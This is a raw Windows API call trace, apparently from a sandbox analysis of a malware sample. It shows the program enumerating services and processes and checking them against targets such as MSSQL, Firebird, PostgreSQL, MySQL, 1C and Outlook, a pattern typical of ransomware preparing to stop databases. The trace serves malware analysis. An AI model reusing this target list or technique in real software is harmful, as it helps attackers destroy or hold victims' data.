lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0248.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0248.413] lstrlenW (lpString="nsi") returned 3 [0248.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0248.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0248.413] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0248.413] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0248.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0248.413] lstrlenW (lpString="PcaSvc") returned 6 [0248.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0248.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0248.413] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0248.413] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0248.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0248.413] lstrlenW (lpString="PlugPlay") returned 8 [0248.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0248.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0248.414] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0248.414] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0248.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0248.414] lstrlenW (lpString="Power") returned 5 [0248.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0248.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0248.414] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0248.414] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0248.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0248.414] lstrlenW (lpString="ProfSvc") returned 7 [0248.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0248.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0248.414] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0248.414] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0248.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0248.414] lstrlenW (lpString="RpcEptMapper") returned 12 [0248.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0248.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0248.414] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0248.414] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0248.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0248.414] lstrlenW (lpString="RpcSs") returned 5 [0248.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0248.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0248.414] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0248.414] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0248.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0248.415] lstrlenW (lpString="SamSs") returned 5 [0248.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0248.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0248.415] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0248.415] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0248.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0248.415] lstrlenW (lpString="Schedule") returned 8 [0248.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0248.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0248.415] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0248.415] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0248.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0248.415] lstrlenW (lpString="SENS") returned 4 [0248.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0248.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0248.415] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0248.415] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0248.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0248.415] lstrlenW (lpString="ShellHWDetection") returned 16 [0248.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0248.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0248.415] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0248.415] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0248.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0248.415] lstrlenW (lpString="Spooler") returned 7 [0248.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0248.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0248.415] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0248.415] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0248.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0248.416] lstrlenW (lpString="SysMain") returned 7 [0248.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0248.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0248.416] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0248.416] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0248.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0248.416] lstrlenW (lpString="Themes") returned 6 [0248.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0248.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0248.416] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0248.416] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0248.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0248.416] lstrlenW (lpString="UxSms") returned 5 [0248.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0248.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0248.416] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0248.416] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0248.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0248.416] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0248.416] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e8 [0248.418] Process32FirstW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.418] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.418] lstrlenW (lpString="System") returned 6 [0248.418] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0248.418] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0248.418] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0248.418] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0248.418] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0248.418] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0248.418] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0248.418] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.419] lstrlenW (lpString="smss.exe") returned 8 [0248.419] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0248.419] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0248.419] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0248.419] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0248.419] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0248.419] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0248.419] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0248.419] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.419] lstrlenW (lpString="csrss.exe") returned 9 [0248.419] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0248.419] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0248.419] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0248.419] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0248.419] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0248.419] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0248.419] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0248.419] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.420] lstrlenW (lpString="wininit.exe") returned 11 [0248.420] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0248.420] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0248.420] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0248.420] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0248.420] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0248.420] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0248.420] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0248.420] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.420] lstrlenW (lpString="csrss.exe") returned 9 [0248.420] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0248.420] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0248.420] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0248.420] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0248.420] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0248.420] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0248.420] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0248.420] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.421] lstrlenW (lpString="winlogon.exe") returned 12 [0248.421] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0248.421] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0248.421] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0248.421] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0248.421] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0248.421] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0248.421] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0248.421] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.421] lstrlenW (lpString="services.exe") returned 12 [0248.421] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0248.421] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0248.421] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0248.421] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0248.421] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0248.421] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0248.421] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0248.421] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.422] lstrlenW (lpString="lsass.exe") returned 9 [0248.422] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0248.422] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0248.422] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0248.422] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0248.422] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0248.422] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0248.422] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0248.422] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0248.422] lstrlenW (lpString="lsm.exe") returned 7 [0248.422] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0248.422] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0248.422] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0248.422] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0248.422] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0248.422] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0248.422] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0248.422] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.423] lstrlenW (lpString="svchost.exe") returned 11 [0248.423] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0248.423] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.423] lstrlenW (lpString="svchost.exe") returned 11 [0248.423] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0248.423] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0248.423] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.424] lstrlenW (lpString="svchost.exe") returned 11 [0248.424] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0248.424] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.424] lstrlenW (lpString="svchost.exe") returned 11 [0248.424] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0248.424] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0248.424] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.425] lstrlenW (lpString="svchost.exe") returned 11 [0248.425] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.425] lstrlenW (lpString="audiodg.exe") returned 11 [0248.425] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.425] lstrlenW (lpString="svchost.exe") returned 11 [0248.425] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.426] lstrlenW (lpString="svchost.exe") returned 11 [0248.426] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0248.426] lstrlenW (lpString="userinit.exe") returned 12 [0248.426] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.426] lstrlenW (lpString="dwm.exe") returned 7 [0248.426] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.426] lstrlenW (lpString="explorer.exe") returned 12 [0248.426] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.427] lstrlenW (lpString="spoolsv.exe") returned 11 [0248.427] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.427] lstrlenW (lpString="taskhost.exe") returned 12 [0248.427] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.428] lstrlenW (lpString="svchost.exe") returned 11 [0248.428] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0248.428] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0248.428] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0248.428] lstrlenW (lpString="reader_sl.exe") returned 13 [0248.428] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0248.428] lstrlenW (lpString="dllhost.exe") returned 11 [0248.428] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0248.429] CloseHandle (hObject=0x2e8) returned 1 [0248.429] Sleep (dwMilliseconds=0x1f4) [0249.051] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea290 [0249.210] EnumServicesStatusExW (in: hSCManager=0x47ea290, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0249.210] GetLastError () returned 0xea [0249.210] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dee5b0 [0249.210] EnumServicesStatusExW (in: hSCManager=0x47ea290, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0249.210] CloseServiceHandle (hSCObject=0x47ea290) returned 1 [0249.210] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0249.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0249.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0249.211] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0249.211] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0249.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0249.211] lstrlenW (lpString="AudioSrv") returned 8 [0249.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0249.211] 